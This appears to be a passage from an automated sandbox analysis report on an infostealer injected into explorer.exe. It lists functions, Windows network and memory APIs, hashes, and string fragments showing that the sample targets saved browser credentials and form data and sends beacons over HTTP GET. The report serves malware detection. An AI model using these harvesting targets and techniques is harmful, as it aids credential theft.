Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	15

Executed Functions

Function 10B4FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 10B5012E
setsockopt.WS2_32 ref: 10B50830
recv.WS2_32 ref: 10B50859

Strings

&sql, xrefs: 10B50471
dat=, xrefs: 10B50290
nnec, xrefs: 10B5032A
&un=, xrefs: 10B504F1
: cl, xrefs: 10B50338
&br=, xrefs: 10B50509
ose, xrefs: 10B5033F
GET , xrefs: 10B50318
tion, xrefs: 10B50331
Co, xrefs: 10B50323

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 3ef48cabcdb43f6417f7e0578c6441493f9ab86d2533eaffa616acd8e0c40ae0
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 5B529134624A488FC759EF68C4957E9B7E1FB54300F504AAEE49FC7146EE30B94ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 10B4F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 10B4F449

Strings

`, xrefs: 10B4F41D

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: a73b79e5f8b499545d66fe4947d571cda2b142cd5be7406900d74300bc0e0a42
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 7C225D70A18A0A9FCB49DF28C4997AAF7F1FB58300F61422EE45ED7250DB30E951DB85

Uniqueness

Uniqueness Score: -1.00%

Function 10B50E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10B50E67

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: fa557270ae41de34d90b1eee2cb0f0c112c1b8283bfdb865175c805a04b3cb1c
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: DD019E34628B884F8B88EF6C948522AB7E4FBD9214F000B3EA99AC3250EB60C5414742

Uniqueness

Uniqueness Score: -1.00%

Function 10B50E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10B50E67

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 129ea740b78c2210d99f09af7bd5ec7c741429dddfa98cc668b2d47e5f87464d
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 9F01A23462CB884B8B48EB2C94462A6B3E5FBCE314F000B7EE99AC3240DB61D5024782

Uniqueness

Uniqueness Score: -1.00%

Function 10B4A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 10B4A9A0

Strings

User-Agent: , xrefs: 10B4A935, 10B4A948
nt: , xrefs: 10B4A91E
on.d, xrefs: 10B4A902
urlmon.dll, xrefs: 10B4A959

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b447ee743b625d8059fb0b4330dd7995e308b36a25dcb551c8fadbcef4c4c69e
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: E931E331614A4C8FCB45EFA8C8857EDB7E0FF58205F40026AE44ED7280DF749649C789

Uniqueness

Uniqueness Score: -1.00%

Function 10B4A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 10B4A9A0

Strings

User-Agent: , xrefs: 10B4A935, 10B4A948
nt: , xrefs: 10B4A91E
on.d, xrefs: 10B4A902
urlmon.dll, xrefs: 10B4A959

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 8fd03b117e1ffbef9b2b374fd5cc5ce3833de7c2402f7006b4630ed5ff87ccc0
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: CC212830614A4C8FCB05EFA8C8457ED7BF0FF58204F40026AE45AD7240DF749649C785

Uniqueness

Uniqueness Score: -1.00%

Function 10B46B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10B46CCA

Strings

kern, xrefs: 10B46B99
.dll, xrefs: 10B46BCD
el32, xrefs: 10B46BA0

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: d69812018deed66221b6487f17db092244dd65ce69308fb5b5b49d96050ef9f7
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 1F414A74918A08CFDB84EFA8C8D97AD77E0FB68300F1445BAD84EDB255DE309A45CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10B46B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10B46CCA

Strings

kern, xrefs: 10B46B99
.dll, xrefs: 10B46BCD
el32, xrefs: 10B46BA0

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 63c5a0dda15056f20286968b83ee4f306db5184f7b0ea004f4e6c1bc94a6cfcd
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 7A411974918A088FDB84EFA8C4D97AD77E0FB68300F1445AAD84ADB255DA309A45CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10B4C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10B4C791

Strings

conn, xrefs: 10B4C75A
ect, xrefs: 10B4C761

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 9c4aa6599072655da5ead00596ee7dad60698d42db79a442053ddae29288cf48
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 50014C30618B188FCB84EF1CE088B55B7E0EB58314F1545AAA90DCB226C674D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 10B4C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10B4C791

Strings

conn, xrefs: 10B4C75A
ect, xrefs: 10B4C761

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 66c284d042f75b9b63d59e9be5b14ed9d40c01a40c7ca8084a909ed01ec1af3e
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: D3012C70618A1C8FCB88EF5CE088B55B7E0FB59314F1541AEA90DCB226CB74CD818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 10B4C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 10B4C713

Strings

send, xrefs: 10B4C6DA

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 8777f8ce1310f7cfae562529ec31a9459f7b5669893753a080415873f05ce211
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 73011270518A1D8FDBC8DF1CD049B1577E0EB58314F1645AED85DCB266C670D9818B85

Uniqueness

Uniqueness Score: -1.00%

Function 10B4C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 10B4C611

Strings

sock, xrefs: 10B4C5D9

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 9da489467300d01c1a61c58016c3bac484710ef300218ae10e427b0bea78e351
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 6C01447061861C8FC784DF1CD048B54BBE0FB59354F1545ADE45EDB266C7B0C981CB86

Uniqueness

Uniqueness Score: -1.00%

Function 10B442DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 10B4432D

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 8af858fe7abcbe5301c8a014df324ce15f672f6c50cc1e26b1f7a9274357c3d3
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 12318B74604B49DFDB58DF698088295F3E0FB54301F6442BEC96ECB206CB78A660DF95

Uniqueness

Uniqueness Score: -1.00%

Function 10B44412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 10B44461

Memory Dump Source

Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: afa4182df66a456f422d42ab1f1d0c7d13525a5e1c3b0303f0233b6daa2bd431
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: C0F04630268A080FD788EF2CD44563AF3D0FBE8200F40067EA58EC3224CE39D5828706

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 111DDD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

M, xrefs: 111DE082
S, xrefs: 111DE073
ll, xrefs: 111DDF13
net., xrefs: 111DDF44
wini, xrefs: 111DDF72
user, xrefs: 111DDF03
el32, xrefs: 111DDF27
32.d, xrefs: 111DDF0B
kern, xrefs: 111DDF5A
dll, xrefs: 111DDF4C
.dll, xrefs: 111DDF2F

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: dff08abf9e26a4e0a60014b0e6f2359fd5b17da2f465c5e3f5cc806bff8489e0
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 32E15874618F488FCB65DF68C4887AAF7E0FB58305F804A2E959BC7241EF30A541CB85

Uniqueness

Uniqueness Score: -1.00%

Function 111E0792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

Fiel, xrefs: 111E0884
name, xrefs: 111E087D
user, xrefs: 111E0876
dUse, xrefs: 111E08AD
itUR, xrefs: 111E085D
d, xrefs: 111E08F2
dPas, xrefs: 111E08E2
swor, xrefs: 111E08EA
rnam, xrefs: 111E08B5
encr, xrefs: 111E089D
Subm, xrefs: 111E0855
e, xrefs: 111E08BD
guid, xrefs: 111E07CE
encr, xrefs: 111E08D2
ypte, xrefs: 111E08A5
form, xrefs: 111E084D
ypte, xrefs: 111E08DA

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 1ecf0b0037f7f5a2b7415ef7ea2970053933f0ccb8d0ffa36f24b5c276bd59a1
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 67B16C30518B488EDB56DFA88489AEEF7F1FF98308F50451ED49AC7251EF70A5058B86

Uniqueness

Uniqueness Score: -1.00%

Function 111DE622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

i, xrefs: 111DE69E
p, xrefs: 111DE690
l, xrefs: 111DE6AC
l, xrefs: 111DE682
2, xrefs: 111DE674
c, xrefs: 111DE697
d, xrefs: 111DE6CF
w, xrefs: 111DE6B3
s, xrefs: 111DE689
d, xrefs: 111DE67B
t, xrefs: 111DE6C8
n, xrefs: 111DE6C1
d, xrefs: 111DE6A5
u, xrefs: 111DE661
e, xrefs: 111DE66D
l, xrefs: 111DE6D6
n, xrefs: 111DE6BA

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 9caa077141bd972a934937d348366fe0a42c9c33e3dd815b73cb395c4cc657a3
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: CC41AF70B18B188FDF14DF88A4496BDBBF2EB48705F00025ED409D3245DBB5A9458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 111E5AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

], xrefs: 111E5C3D
], xrefs: 111E5CA8
l, xrefs: 111E5CE2
e, xrefs: 111E5CA0
n, xrefs: 111E5C98
b, xrefs: 111E5C73
[, xrefs: 111E5CCD
[, xrefs: 111E5BF6
c, xrefs: 111E5C0B
[, xrefs: 111E5C90
l, xrefs: 111E5C35
[, xrefs: 111E5C2D
[, xrefs: 111E5C66
D, xrefs: 111E5CDA

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 94c6f8b6105f4eec2da59bdf40844a42b85b05c4ef71405b5e348b440666619f
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 06C15B75218F098FC759EF68C489AEAF7E1FB98308F40462E959AC7210DF30B515CB86

Uniqueness

Uniqueness Score: -1.00%

Function 111E5F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 111E5F63
r, xrefs: 111E5F88
r, xrefs: 111E5F98
r, xrefs: 111E5FB8
r, xrefs: 111E5F90
r, xrefs: 111E5FB0
r, xrefs: 111E5FC0
n, xrefs: 111E5F6B
r, xrefs: 111E5FA0
c, xrefs: 111E5FC8
0, xrefs: 111E5F5B
r, xrefs: 111E5FA8

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 01a0d56bda24f16ae85f0cebd0e1b8dcf563ae1b96a49a7515246bf50b360e1c
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 6851E735519B488FD70ACF58D4852AAF7E5FBC5704F50192EE8CBC7242DBB4A506CB82

Uniqueness

Uniqueness Score: -1.00%

Function 111DF2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 111DF320
dll, xrefs: 111DF32E
cli., xrefs: 111DF327
nspr, xrefs: 111DF4D4
opera_browser.dll, xrefs: 111DF629
4.dl, xrefs: 111DF4DB
l, xrefs: 111DF4E2
dragon_s.dll, xrefs: 111DF614

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 3906eb243f031fef719f9237f4a3ce0bfcf7c44bbe9543e1e678a4d214dcfded
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: C6C18375619E1A4FCB49DF68D459AEAF3E1FF98308F814329944EC7250DF30A642C786

Uniqueness

Uniqueness Score: -1.00%

Function 111DF2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 111DF320
dll, xrefs: 111DF32E
cli., xrefs: 111DF327
nspr, xrefs: 111DF4D4
opera_browser.dll, xrefs: 111DF629
4.dl, xrefs: 111DF4DB
l, xrefs: 111DF4E2
dragon_s.dll, xrefs: 111DF614

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 7ea80613c1e12c1eb7b5fd79e0f46c4e10549e183a139ae94216c5f704fdea75
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 95C19375619E1A4FCB49DF68D499AEAF3E1FF98308F414329944EC7250DF30A642CB86

Uniqueness

Uniqueness Score: -1.00%

Function 111E0CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 111E0D9E
L: , xrefs: 111E0D66
2, xrefs: 111E0DE1
name, xrefs: 111E0DB2
User, xrefs: 111E0DAB
Pass, xrefs: 111E0D97
UR, xrefs: 111E0D5F

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 8f0205fb859e54ef2de3545da32faef1ff10904f46104307a3072c4e10489d71
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: FEA1AE70618B488FDB1ADFA894487EEBBE1FF98304F40462DD48AD7252EF709545C789

Uniqueness

Uniqueness Score: -1.00%

Function 111E0CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 111E0D9E
L: , xrefs: 111E0D66
2, xrefs: 111E0DE1
name, xrefs: 111E0DB2
User, xrefs: 111E0DAB
Pass, xrefs: 111E0D97
UR, xrefs: 111E0D5F

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: bfb14b5c858553707539f564bcdf69f238d922782b48a5c749af975af943bf3a
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: E2918E70618B488FDB19DFA8D448BEEBBE1FF98304F40462DD48AD7252EF7095458785

Uniqueness

Uniqueness Score: -1.00%

Function 111E0352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 111E047C
n, xrefs: 111E03E7
., xrefs: 111E03B0
e, xrefs: 111E048E
v, xrefs: 111E04A0

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 2ed13d9cd1c7009a68f8b04622da91dde8d67eaf22c3964a86c2307782e7974d
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: D2718F31618B498FD759DFA8C4886AAF7F1FF98308F00062ED44AC7261EB71E9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 111DBC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 111DBC97
ole3, xrefs: 111DBC5D
dll, xrefs: 111DBC9E
shel, xrefs: 111DBC90
2.dl, xrefs: 111DBC64

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: c4439963ff5b86508ff4870ee07c55ff250a7fd38db90ce77d1474f0f3e02c06
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: DE514AB0918B4D8FDB55DFA4C084AEEF7E1FF58304F404A2E959AE7214EF30A5418B89

Uniqueness

Uniqueness Score: -1.00%

Function 111DC86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

4, xrefs: 111DC9E9
ion., xrefs: 111DC8EC
dll, xrefs: 111DC8F4
vers, xrefs: 111DC8E4
\, xrefs: 111DC9E0

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
